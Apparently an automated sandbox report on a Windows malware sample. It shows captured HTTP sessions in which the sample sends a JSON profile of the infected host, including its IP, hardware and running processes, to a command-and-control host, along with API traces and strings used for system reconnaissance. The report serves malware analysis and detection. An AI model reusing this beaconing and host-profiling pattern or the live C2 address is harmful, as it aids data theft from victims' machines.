                                          Host: home.fiveth5ht.top
                                          Accept: */*
                                          Content-Type: application/json
                                          Content-Length: 504434
                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001156471", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", [TRUNCATED]
                                          Dec 27, 2024 08:55:42.699150085 CET | 157 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.22.1
                                          Date: Fri, 27 Dec 2024 07:55:42 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 1
                                          Connection: close
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          1 | 192.168.2.6 | 49746 | 5.101.3.217 | 80 | 1460 | C:\Users\user\Desktop\qZA8AyGxiA.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 27, 2024 08:55:43.022077084 CET | 98 | OUT | GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                          Host: home.fiveth5ht.top
                                          Accept: */*
                                          Dec 27, 2024 08:55:44.536753893 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                          Server: nginx/1.22.1
                                          Date: Fri, 27 Dec 2024 07:55:44 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 207
                                          Connection: close
                                          Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          2 | 192.168.2.6 | 49753 | 5.101.3.217 | 80 | 1460 | C:\Users\user\Desktop\qZA8AyGxiA.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 27, 2024 08:55:45.456326962 CET | 171 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                          Host: home.fiveth5ht.top
                                          Accept: */*
                                          Content-Type: application/json
                                          Content-Length: 31
                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                          Data Ascii: { "id1": "0", "data": "Done1" }
                                          Dec 27, 2024 08:55:47.076733112 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                          Server: nginx/1.22.1
                                          Date: Fri, 27 Dec 2024 07:55:46 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Content-Length: 207
                                          Connection: close
                                          Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.6 | 49724 | 3.218.7.103 | 443 | 1460 | C:\Users\user\Desktop\qZA8AyGxiA.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-27 07:55:35 UTC | 52 | OUT | GET /ip HTTP/1.1
                                          Host: httpbin.org
                                          Accept: */*
                                          2024-12-27 07:55:36 UTC | 224 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 27 Dec 2024 07:55:36 GMT
                                          Content-Type: application/json
                                          Content-Length: 31
                                          Connection: close
                                          Server: gunicorn/19.9.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Credentials: true
                                          2024-12-27 07:55:36 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                          Data Ascii: { "origin": "8.46.123.189"}


                                          Target ID: 0
                                          Start time: 02:55:28
                                          Start date: 27/12/2024
                                          Path: C:\Users\user\Desktop\qZA8AyGxiA.exe
                                          Wow64 process (32bit): true
                                          Commandline: "C:\Users\user\Desktop\qZA8AyGxiA.exe"
                                          Imagebase: 0x8a0000
                                          File size: 4'508'672 bytes
                                          MD5 hash: 75F83958DC211DDD4DFED631AED3AAFA
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Reputation: low
                                          Has exited: true

                                            Execution Graph

                                            Execution Coverage: 2.5%
                                            Dynamic/Decrypted Code Coverage: 0%
                                            Signature Coverage: 17.4%
                                            Total number of Nodes: 454
                                            Total number of Limit Nodes: 74
55824->55826 55835 8b22d0 _open 55824->55835 55825 8b0150 _open 55825->55826 55826->55825 55831 8b0f7b 55826->55831 55832 8a75a0 _open 55826->55832 55836 8dd4d0 _open 55826->55836 55837 8b4940 _open 55826->55837 55827->55826 55834 8b0150 _open 55827->55834 55832->55826 55834->55826 55835->55826 55836->55826 55837->55826 55549 8a3d5e 55552 8a3d30 55549->55552 55551 8a3d90 55552->55549 55552->55551 55553 8b0ab0 55552->55553 55556 8b05b0 55553->55556 55557 8b05bd 55556->55557 55561 8b07c7 55556->55561 55560 8b066a 55557->55560 55557->55561 55569 8b07ce 55557->55569 55577 8b03c0 _open 55557->55577 55578 8b7450 _open 55557->55578 55567 8b06f0 55560->55567 55560->55569 55579 8b73b0 _open 55560->55579 55561->55552 55564 8b0707 WSAEventSelect 55564->55567 55564->55569 55565 8b07ef 55565->55569 55572 8b0847 55565->55572 55573 8b6fa0 55565->55573 55567->55564 55567->55565 55568 8a76a0 2 API calls 55567->55568 55568->55567 55580 8b7380 _open 55569->55580 55570 8b09e8 WSAEnumNetworkEvents 55571 8b09d0 WSAEventSelect 55570->55571 55570->55572 55571->55570 55571->55572 55572->55569 55572->55570 55572->55571 55574 8b6fd4 55573->55574 55576 8b6feb 55573->55576 55575 8b7207 select 55574->55575 55574->55576 55575->55576 55576->55572 55577->55557 55578->55557 55579->55560 55580->55561 55838 9570a0 55839 9570ae 55838->55839 55841 95717f 55839->55841 55844 9571a7 55839->55844 55845 96a8c0 55839->55845 55849 9571c0 socket ioctlsocket connect getsockname 55839->55849 55841->55844 55850 969320 closesocket 55841->55850 55846 96a8e6 55845->55846 55847 96a903 recvfrom 55845->55847 55846->55847 55848 96a8ed 55846->55848 55847->55848 55848->55839 55849->55839 55850->55844 55851 8a29ff FindFirstFileA 55852 8a2a31 55851->55852 55853 8a2a5c RegOpenKeyExA 55852->55853 55854 8a2a93 55853->55854 55855 8a2ade CharUpperA 55854->55855 55857 8a2b0a 55855->55857 55856 8a2bf9 QueryFullProcessImageNameA 55858 8a2c3b CloseHandle 55856->55858 55857->55856 55860 8a2c64 55858->55860 55859 8a2df1 CloseHandle 
55861 8a2e23 55859->55861 55860->55859 55862 954720 55863 954728 55862->55863 55864 954733 55863->55864 55871 95476c 55863->55871 55872 959270 55863->55872 55866 954774 55868 954860 55875 954950 55868->55875 55870 954878 55871->55870 55881 9530a0 closesocket 55871->55881 55882 95a440 55872->55882 55874 959297 55874->55868 55876 954966 55875->55876 55879 9549c5 55876->55879 55880 9549b9 55876->55880 55913 95b590 if_indextoname 55876->55913 55878 954aa0 gethostname 55878->55879 55878->55880 55879->55871 55880->55878 55880->55879 55881->55866 55884 95a46b 55882->55884 55883 95aa03 RegOpenKeyExA 55885 95aa27 RegQueryValueExA 55883->55885 55886 95ab70 RegOpenKeyExA 55883->55886 55909 95a794 GetBestRoute2 55884->55909 55910 95a6c7 GetBestRoute2 55884->55910 55911 95a4db 55884->55911 55888 95aa71 55885->55888 55889 95aacc RegQueryValueExA 55885->55889 55887 95ac34 RegOpenKeyExA 55886->55887 55900 95ab90 55886->55900 55890 95acf8 RegOpenKeyExA 55887->55890 55905 95ac54 55887->55905 55888->55889 55894 95aa85 RegQueryValueExA 55888->55894 55891 95ab66 RegCloseKey 55889->55891 55892 95ab0e 55889->55892 55893 95ad56 RegEnumKeyExA 55890->55893 55895 95ad14 55890->55895 55891->55886 55892->55891 55898 95ab1e RegQueryValueExA 55892->55898 55893->55895 55896 95ad9b 55893->55896 55897 95aab3 55894->55897 55895->55874 55899 95ae16 RegOpenKeyExA 55896->55899 55897->55889 55903 95ab4c 55898->55903 55901 95ae34 RegQueryValueExA 55899->55901 55902 95addf RegEnumKeyExA 55899->55902 55900->55887 55904 95af43 RegQueryValueExA 55901->55904 55912 95adaa 55901->55912 55902->55895 55902->55899 55903->55891 55906 95b052 RegQueryValueExA 55904->55906 55904->55912 55905->55890 55907 95adc7 RegCloseKey 55906->55907 55906->55912 55907->55902 55908 95afa0 RegQueryValueExA 55908->55912 55909->55884 55910->55884 55911->55883 55911->55895 55912->55904 55912->55906 55912->55907 55912->55908 55913->55880 55581 96a080 55584 969740 55581->55584 55583 96a09b 55585 969780 55584->55585 55589 96975d 
55584->55589 55586 969925 RegOpenKeyExA 55585->55586 55585->55589 55587 96995a RegQueryValueExA 55586->55587 55586->55589 55588 969986 RegCloseKey 55587->55588 55588->55589 55589->55583 55590 96b180 55591 96b2e3 55590->55591 55592 96b19b 55590->55592 55592->55591 55595 96b2a9 getsockname 55592->55595 55597 96b020 closesocket 55592->55597 55598 96af30 55592->55598 55602 96b060 55592->55602 55607 96b020 55595->55607 55597->55592 55599 96af63 socket 55598->55599 55600 96af4c 55598->55600 55599->55592 55600->55599 55601 96af52 55600->55601 55601->55592 55606 96b080 55602->55606 55603 96b0b0 connect 55604 96b0bf WSAGetLastError 55603->55604 55605 96b0ea 55604->55605 55604->55606 55605->55592 55606->55603 55606->55604 55606->55605 55608 96b052 55607->55608 55609 96b029 55607->55609 55608->55592 55610 96b04b closesocket 55609->55610 55611 96b03e 55609->55611 55610->55608 55611->55592 55914 96a920 55915 96a944 55914->55915 55916 96a977 send 55915->55916 55917 96a94b 55915->55917 55612 8a255d 55613 c29f70 55612->55613 55614 8a256c GetSystemInfo 55613->55614 55615 8a2589 55614->55615 55616 8a25a0 GlobalMemoryStatusEx 55615->55616 55617 8a25ec 55616->55617 55618 8a263c GetDriveTypeA 55617->55618 55619 8a2762 55617->55619 55618->55617 55620 8a2655 GetDiskFreeSpaceExA 55618->55620 55621 8a27d6 KiUserCallbackDispatcher 55619->55621 55620->55617 55622 8a27f8 55621->55622 55623 8a28d9 FindFirstFileW 55622->55623 55624 8a2906 FindNextFileW 55623->55624 55625 8a2928 55623->55625 55624->55624 55624->55625 55626 8a31d7 55629 8a31f4 55626->55629 55627 8a3200 55628 8a32dc CloseHandle 55628->55627 55629->55627 55629->55628 55630 8a2f17 55638 8a2f2c 55630->55638 55631 8a31d3 55632 8a2fb3 RegOpenKeyExA 55632->55638 55633 8a315c RegEnumKeyExA 55634 8a31b2 RegCloseKey 55633->55634 55633->55638 55634->55638 55635 8a3046 RegOpenKeyExA 55636 8a3089 RegQueryValueExA 55635->55636 55635->55638 55637 8a313b RegCloseKey 55636->55637 55636->55638 55637->55638 55638->55631 55638->55632 55638->55633 
55638->55635 55638->55637 55639 8d8b50 55640 8d8b6b 55639->55640 55668 8d8be6 55639->55668 55641 8d8b8f 55640->55641 55642 8d8bf3 55640->55642 55640->55668 55741 8b6e40 select 55641->55741 55672 8da550 55642->55672 55646 8d8cd9 SleepEx 55655 8d8d13 55646->55655 55647 8d8e85 55651 8d8eae 55647->55651 55647->55668 55747 8b2a00 _open 55647->55747 55648 8d8c1f connect 55649 8d8c35 55648->55649 55729 8da150 55649->55729 55650 8da150 2 API calls 55660 8d8dff 55650->55660 55651->55668 55748 8a78b0 closesocket 55651->55748 55652 8d8cb2 55652->55647 55652->55650 55652->55668 55655->55652 55656 8d8d43 55655->55656 55664 8da150 2 API calls 55656->55664 55658 8d8bb5 55658->55668 55743 8e50a0 _open 55658->55743 55659 8d8c8b 55662 8d8ba1 55659->55662 55663 8d8dc8 55659->55663 55660->55647 55745 8bd090 _open 55660->55745 55662->55646 55662->55652 55662->55658 55744 8db100 _open 55663->55744 55664->55658 55667 8d8e67 55746 8e4fd0 _open 55667->55746 55673 8da575 55672->55673 55677 8da597 55673->55677 55752 8a75e0 55673->55752 55676 8da709 55679 8a78b0 2 API calls 55676->55679 55687 8da713 55676->55687 55723 8da6d9 55677->55723 55764 8def30 55677->55764 55678 8da63a 55683 8da641 55678->55683 55688 8da69b 55678->55688 55679->55687 55680 8d8bfc 55680->55648 55680->55649 55680->55652 55680->55668 55682 8da7e5 55686 8da811 setsockopt 55682->55686 55692 8da87c 55682->55692 55702 8da8ee 55682->55702 55683->55682 55773 8e4fd0 _open 55683->55773 55686->55692 55694 8da83b 55686->55694 55687->55680 55772 8e50a0 _open 55687->55772 55769 8bd090 _open 55688->55769 55690 8da6c9 55770 8e4f40 _open 55690->55770 55692->55702 55776 8db1e0 _open 55692->55776 55694->55692 55774 8bd090 _open 55694->55774 55697 8daf56 55698 8daf5d 55697->55698 55697->55723 55698->55687 55701 8da150 2 API calls 55698->55701 55699 8da86d 55775 8e4fd0 _open 55699->55775 55701->55687 55703 8dabb9 55702->55703 55705 8dacb8 55702->55705 55706 8dae32 55702->55706 55713 8daf33 55702->55713 55719 8dabe1 55702->55719 55702->55723 
55708 8dad45 55703->55708 55710 8dade6 55703->55710 55703->55719 55778 8d6be0 select closesocket _open 55703->55778 55704 8db056 55786 8bd090 _open 55704->55786 55705->55703 55715 8dacdc 55705->55715 55705->55723 55706->55703 55783 8e4fd0 _open 55706->55783 55707 8daf03 55707->55713 55784 8e4fd0 _open 55707->55784 55708->55710 55720 8dad5f 55708->55720 55781 8bd090 _open 55710->55781 55768 9067e0 ioctlsocket 55713->55768 55777 8bd090 _open 55715->55777 55717 8db07b 55787 8e4f40 _open 55717->55787 55719->55704 55719->55707 55719->55723 55785 8e4fd0 _open 55719->55785 55721 8dadb7 55720->55721 55779 8e4fd0 _open 55720->55779 55780 8f3030 _open 55721->55780 55723->55676 55723->55687 55771 8b2a00 _open 55723->55771 55726 8dad01 55782 8e4f40 _open 55726->55782 55730 8da15f 55729->55730 55739 8d8c4d 55729->55739 55731 8da181 getsockname 55730->55731 55730->55739 55732 8da1f7 55731->55732 55733 8da1d0 55731->55733 55734 8def30 _open 55732->55734 55792 8bd090 _open 55733->55792 55737 8da20f 55734->55737 55736 8da1eb 55794 8e4f40 _open 55736->55794 55737->55739 55793 8bd090 _open 55737->55793 55739->55659 55742 8e50a0 _open 55739->55742 55741->55662 55742->55659 55743->55668 55744->55652 55745->55667 55746->55647 55747->55651 55749 8a78d7 55748->55749 55750 8a78c5 55748->55750 55749->55668 55795 8a72a0 _open 55750->55795 55753 8a75ef 55752->55753 55754 8a7607 socket 55752->55754 55753->55754 55757 8a7643 55753->55757 55758 8a7601 55753->55758 55755 8a762b 55754->55755 55756 8a763a 55754->55756 55788 8a72a0 _open 55755->55788 55756->55677 55789 8a72a0 _open 55757->55789 55758->55754 55761 8a7654 55790 8acb20 _open 55761->55790 55763 8a7674 55763->55677 55765 8defa8 55764->55765 55767 8def47 55764->55767 55765->55767 55791 8ac960 _open 55765->55791 55767->55678 55768->55697 55769->55690 55770->55723 55771->55676 55772->55680 55773->55682 55774->55699 55775->55692 55776->55702 55777->55726 55778->55708 55779->55721 55780->55719 55781->55726 55782->55723 55783->55703 
55784->55713 55785->55719 55786->55717 55787->55723 55788->55756 55789->55761 55790->55763 55791->55767 55792->55736 55793->55736 55794->55739 55795->55749 55918 8d95b0 55919 8d95c8 55918->55919 55920 8d95fd 55918->55920 55919->55920 55921 8da150 2 API calls 55919->55921 55921->55920
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                            • API String ID: 0-1590685507
                                            • Opcode ID: dfbc3dcc29f4b4cca8282c24c419d1780556f7bcc541c49f6c39f53ee5bedbe9
                                            • Instruction ID: 70e1517da8f4f65406b57e4632a51faa166d16a4c9f264e5ffc3b9b1e0977f68
                                            • Opcode Fuzzy Hash: dfbc3dcc29f4b4cca8282c24c419d1780556f7bcc541c49f6c39f53ee5bedbe9
                                            • Instruction Fuzzy Hash: C8C29D31A043449FD714CF29C484B6AB7E1FF85318F098A6AED99DB352D770E984DB82

                                            Control-flow Graph

                                            APIs
                                            • GetSystemInfo.KERNELBASE ref: 008A2579
                                            • GlobalMemoryStatusEx.KERNELBASE ref: 008A25CC
                                            • GetDriveTypeA.KERNELBASE ref: 008A2647
                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 008A267E
                                            • KiUserCallbackDispatcher.NTDLL ref: 008A27E2
                                            • FindFirstFileW.KERNELBASE ref: 008A28F8
                                            • FindNextFileW.KERNELBASE ref: 008A291F
                                            Strings
                                            Similarity
                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                            • String ID: @$`
                                            • API String ID: 3271271169-3318628307
                                            • Opcode ID: b7705bcc9a7b078e309d6f59daa6bd2cec087b8daa9817af13cb3fefc0b87666
                                            • Instruction ID: 68604fd4b2d532eee546536403f2bb0e463becfeca0acdf60bd5aeb38518e8b9
                                            • Opcode Fuzzy Hash: b7705bcc9a7b078e309d6f59daa6bd2cec087b8daa9817af13cb3fefc0b87666
                                            • Instruction Fuzzy Hash: 3CD1D5B49093189FCB10EF68D59569EBBF0FF84354F008869E898D7311E7349A84DF92

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                            • String ID: 0
                                            • API String ID: 2406880114-4108050209
                                            • Opcode ID: 8bdb39e4707dda8d1bf91fc7f68dc9936b17e4703a011ba68f71b61420a337e7
                                            • Instruction ID: d44eaa0a99dfe4adef319964407bfc44802d38f692e43061f5d8003d8a4d8848
                                            • Opcode Fuzzy Hash: 8bdb39e4707dda8d1bf91fc7f68dc9936b17e4703a011ba68f71b61420a337e7
                                            • Instruction Fuzzy Hash: 12E106B49053199FDB10EF68D98569DBBF4FF88304F008869E898E7350E7749988DF92

                                            Control-flow Graph

                                            APIs
                                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 008B0712
                                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 008B09DC
                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008B09FC
                                            Strings
                                            Similarity
                                            • API ID: EventSelect$EnumEventsNetwork
                                            • String ID: multi.c
                                            • API String ID: 2170980988-214371023
                                            • Opcode ID: 7815692710386805476925a7aa6a26a97f4be53a84aa2b6d223990151be8f1c7
                                            • Instruction ID: aec676f38ec0f3a867ea96b0885ea7c7a7195b8ba6dda7497f6e030d8c0bcf42
                                            • Opcode Fuzzy Hash: 7815692710386805476925a7aa6a26a97f4be53a84aa2b6d223990151be8f1c7
                                            • Instruction Fuzzy Hash: 7BD19A756083059BE710CE24C881BABBBE9FB94348F04882CF985C6352EB75E959DB52

                                            APIs
                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 0096B2B6
                                            Similarity
                                            • API ID: getsockname
                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                            • API String ID: 3358416759-2430778319
                                            • Opcode ID: 659e0b6aa08784adbee655cb1cf40024b673b5218d430cce02cd771fe1ee9878
                                            • Instruction ID: f4c54d2642c0143aada58ab184926f04780f879cb52ad3e9621a4892a6009109
                                            • Opcode Fuzzy Hash: 659e0b6aa08784adbee655cb1cf40024b673b5218d430cce02cd771fe1ee9878
                                            • Instruction Fuzzy Hash: F6C18C716053159FD718DF24C890A6AB7E5AF88314F04896DF84ACB3A2EB35ED85CB81
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f0c6ea39695c717c948332fdc77d606a3831491eac4962d8730f3ac4ce8e5c9
                                            • Instruction ID: 17c54437d33f2c850b196001944610c51ffac3e838ed3a9aee729305f0905de3
                                            • Opcode Fuzzy Hash: 1f0c6ea39695c717c948332fdc77d606a3831491eac4962d8730f3ac4ce8e5c9
                                            • Instruction Fuzzy Hash: D091EF3060D74A8BD7359A2888D47FBB2D9FBC4324F148B2CE899863D4EB75AC419691
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 008A1238
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 9c4a071416d1cf377385867911fefd3c3077d3a461cf1a1c2c7b9aafc5c384f8
                                            • Instruction ID: 85b88a332b21ed13547533cf11587bc8f0fe6a45d668d434fd6100782f61592a
                                            • Opcode Fuzzy Hash: 9c4a071416d1cf377385867911fefd3c3077d3a461cf1a1c2c7b9aafc5c384f8
                                            • Instruction Fuzzy Hash: A581BFB19053188FEF10DF64E88836EBBE1FB46704F10482DD989CBB51D7759988EB92
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 008A1238
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 2d7b3ef7f464e9f3800c2b66988d928946bbfc22586b291f2fb1bddd2836da72
                                            • Instruction ID: b105e9d5b5e67eaee75610698a99b7036ee83481197661713b56ae7519eca2a2
                                            • Opcode Fuzzy Hash: 2d7b3ef7f464e9f3800c2b66988d928946bbfc22586b291f2fb1bddd2836da72
                                            • Instruction Fuzzy Hash: 58414BB0A053198FEB10EF68E88475DBBF0FB49704F14442DD989DB750D7749984EB52
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 008A1238
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 0d840b5c5e16b5d03cfe4077dd701f6b1b5190c47b0ec62fa8ed999012efdb1a
                                            • Instruction ID: e75dbd404dfcbf8e2fc6c165bb1c225762bd840c93a8d25ec4fffd99fcd5fb71
                                            • Opcode Fuzzy Hash: 0d840b5c5e16b5d03cfe4077dd701f6b1b5190c47b0ec62fa8ed999012efdb1a
                                            • Instruction Fuzzy Hash: 6B4105B0A053198FEB10EF64E98435EBBE0FB49704F10482DD9899B751DB74A988EB52
                                            APIs
                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0095712E,?,?,?,00001001,00000000), ref: 0096A90D
                                            Similarity
                                            • API ID: recvfrom
                                            • String ID:
                                            • API String ID: 846543921-0
                                            • Opcode ID: fb492b06f231f4e9290bb7d4086cc0e14998851b3e0f7b6f428b3b9b97fb01db
                                            • Instruction ID: 44ed89f6570c4f70347c0a6240d674630d113b14e01b06b3620d1dd8dacb2d22
                                            • Opcode Fuzzy Hash: fb492b06f231f4e9290bb7d4086cc0e14998851b3e0f7b6f428b3b9b97fb01db
                                            • Instruction Fuzzy Hash: 3CF06D75108308AFD2109F11DC88D6BBBEDEFC9794F05495DF948232118270AE10CEB2
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0095AA19
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0095AA4C
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0095AA97
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0095AAE9
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0095AB30
                                            • RegCloseKey.KERNELBASE(?), ref: 0095AB6A
                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0095AB82
                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0095AC46
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0095AD0A
                                            • RegEnumKeyExA.KERNELBASE ref: 0095AD8D
                                            • RegCloseKey.KERNELBASE(?), ref: 0095ADD9
                                            • RegEnumKeyExA.KERNELBASE ref: 0095AE08
                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0095AE2A
                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0095AE54
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0095AF63
                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0095AFB2
                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0095B072
                                            Similarity
                                            • API ID: QueryValue$Open$CloseEnum
                                            • String ID: ;z$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$cx
                                            • API String ID: 4217438148-2091938379
                                            • Opcode ID: d0777026a4f1ca9f4ddde6b49c548a57b78aed695e5f30f76572c2ced1e4ca4c
                                            • Instruction ID: 9c24ce87e9d51da6e5e580c99d577b8951b2e0bec8fd1c2bda471a670b35d975
                                            • Opcode Fuzzy Hash: d0777026a4f1ca9f4ddde6b49c548a57b78aed695e5f30f76572c2ced1e4ca4c
                                            • Instruction Fuzzy Hash: B172A3B1608301AFE320DB25DC81B6BB7E8AF85701F144928FD85D72A1E775E948CB97
                                            APIs
                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 008DA832
                                            Strings
                                            • cf-socket.c, xrefs: 008DA5CD, 008DA735
                                            • Local port: %hu, xrefs: 008DAF28
                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 008DAD0A
                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 008DA6CE
                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 008DADAC
                                            • @, xrefs: 008DAC42
                                            • bind failed with errno %d: %s, xrefs: 008DB080
                                            • cf_socket_open() -> %d, fd=%d, xrefs: 008DA796
                                            • Trying [%s]:%d..., xrefs: 008DA689
                                            • Could not set TCP_NODELAY: %s, xrefs: 008DA871
                                            • Trying %s:%d..., xrefs: 008DA7C2, 008DA7DE
                                            • @, xrefs: 008DA8F4
                                            • Bind to local port %d failed, trying next, xrefs: 008DAFE5
                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 008DAE1F
                                            • Local Interface %s is ip %s using address family %i, xrefs: 008DAE60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            • Associated: 00000000.00000002.2402660755.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2402681131.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2402681131.0000000000F79000.00000040.00000001.01000000.00000003.sdmp
